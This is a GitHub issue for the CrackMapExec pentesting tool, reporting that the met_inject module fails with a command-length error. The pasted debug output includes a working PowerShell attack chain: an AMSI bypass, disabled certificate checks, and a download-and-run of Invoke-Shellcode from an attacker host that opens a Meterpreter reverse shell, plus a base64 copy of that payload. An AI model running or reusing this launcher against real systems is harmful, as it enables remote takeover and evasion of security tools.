search

byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License
8.41k stars 1.64k forks source link

Using met_inject module results in length error #179

Closed ryan-wendel closed 7 years ago

ryan-wendel commented 7 years ago

Steps to reproduce

  1. Use the met_inject module in an attempt to spawn a meterpreter shell on a system

  2. Receive a length error and cme hangs.

Command string used

cme --verbose smb -d -u -p '' -M met_inject -o LHOST= LPORT= PAYLOAD=reverse_http[s]

CME verbose output (using the --verbose flag)

DEBUG Passed args: {'content': False, 'cred_id': [], 'darrell': False, 'depth': None, 'disks': False, 'domain': 'GONAD', 'exclude_dirs': '', 'exec_method': None, 'execute': None, 'fail_limit': None, 'force_ps32': False, 'gen_relay_list': None, 'gfail_limit': None, 'groups': None, 'hash': [], 'jitter': None, 'list_modules': False, 'local_auth': False, 'local_groups': None, 'loggedon_users': False, 'lsa': False, 'module': 'met_inject', 'module_options': ['LHOST=192.168.4.61', 'LPORT=8080', 'PAYLOAD=reverse_http'], 'no_output': False, 'ntds': None, 'only_files': False, 'pass_pol': False, 'password': ['ItchyBalls221'], 'pattern': None, 'port': 445, 'protocol': 'smb', 'ps_execute': None, 'regex': None, 'rid_brute': None, 'sam': False, 'server': 'https', 'server_host': '0.0.0.0', 'server_port': None, 'sessions': False, 'share': 'C$', 'shares': False, 'show_module_options': False, 'spider': None, 'spider_folder': '.', 'target': ['192.168.4.27'], 'threads': 100, 'timeout': None, 'ufail_limit': None, 'username': ['user01'], 'users': None, 'verbose': True, 'wmi': None, 'wmi_namespace': 'root\cimv2'} DEBUG CME server type: https SMB 192.168.4.27 445 WIN7CLIENT01 [*] Windows 7 Enterprise 7601 Service Pack 1 x64 (name:WIN7CLIENT01) (domain:GONAD) (signing:False) (SMBv1:True) DEBUG add_credential(credtype=plaintext, domain=GONAD, username=user01, password=ItchyBalls221, groupid=None, pillagedfrom=None) => None SMB 192.168.4.27 445 WIN7CLIENT01 [+] GONAD\user01:ItchyBalls221 (Pwn3d!) DEBUG Generated PS IEX Launcher: [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} IEX (New-Object Net.WebClient).DownloadString('https://192.168.4.61:443/Invoke-Shellcode.ps1') $CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$} $SumTest = $False while ($SumTest -eq $False) { $GeneratedUri = $CharArray | Get-Random -Count 4 $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92) } $RequestUri = -join $GeneratedUri $Request = "http://192.168.4.61:8080/$($RequestUri)" $WebClient = New-Object System.Net.WebClient [Byte[]]$bytes = $WebClient.DownloadData($Request) Invoke-Shellcode -Force -Shellcode $bytes

DEBUG Generated PS command:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{} $command = 'CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgA2ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAFMAaABlAGwAbABjAG8AZABlAC4AcABzADEAJwApAAoAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AIAA0ADgALgAuADUANwAgACsAIAA2ADUALgAuADkAMAAgACsAIAA5ADcALgAuADEAMgAyACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAWwBDAGgAYQByAF0AJABfAH0ACgAgACAAIAAgACAAIAAgACAAJABTAHUAbQBUAGUAcwB0ACAAPQAgACQARgBhAGwAcwBlAAoAIAAgACAAIAAgACAAIAAgAHcAaABpAGwAZQAgACgAJABTAHUAbQBUAGUAcwB0ACAALQBlAHEAIAAkAEYAYQBsAHMAZQApAAoAIAAgACAAIAAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEcAZQBuAGUAcgBhAHQAZQBkAFUAcgBpACAAPQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAUwB1AG0AVABlAHMAdAAgAD0AIAAoACgAWwBpAG4AdABbAF0AXQAgACQARwBlAG4AZQByAGEAdABlAGQAVQByAGkAIAB8ACAATQBlAGEAcwB1AHIAZQAtAE8AYgBqAGUAYwB0ACAALQBTAHUAbQApAC4AUwB1AG0AIAAlACAAMAB4ADEAMAAwACAALQBlAHEAIAA5ADIAKQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAAgACAAIAAgACQAUgBlAHEAdQBlAHMAdABVAHIAaQAgAD0AIAAtAGoAbwBpAG4AIAAkAEcAZQBuAGUAcgBhAHQAZQBkAFUAcgBpAAoAIAAgACAAIAAgACAAIAAgACQAUgBlAHEAdQBlAHMAdAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgA2ADoAOAAwADgAMAAvACQAKAAkAFIAZQBxAHUAZQBzAHQAVQByAGkAKQAiAAoAIAAgACAAIAAgACAAIAAgACQAVwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAKACAAIAAgACAAIAAgACAAIABbAEIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAJABXAGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABSAGUAcQB1AGUAcwB0ACkACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQAgAC0ARgBvAHIAYwBlACAALQBTAGgAZQBsAGwAYwBvAGQAZQAgACQAYgB5AHQAZQBzAA==' if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') { $exec = $Env:windir + '\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) ' + $command + '"' IEX $exec } else { $exec = [System.Convert]::FromBase64String($command) $exec = [Text.Encoding]::Unicode.GetString($exec) IEX $exec }

[-] Command exceeds maximum length of 8191 chars (was 8548). exiting.

OS

root@kali:~# cat /etc/issue Kali GNU/Linux Rolling \n \l root@kali:~# uname -a Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.25-1kali1 (2017-05-04) x86_64 GNU/Linux

Target OS

OS Name: Microsoft Windows 7 Enterprise OS Version: 6.1.7601 Service Pack 1 Build 7601

Detailed issue explanation

Not much else to say. I receive the error if I use http or https.

Mutilhandler used (not that it matters)

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_http set LHOST 192.168.4.61 set LPORT 8080

byt3bl33d3r commented 7 years ago

Thanks. Wil fix when I get some time. Cheers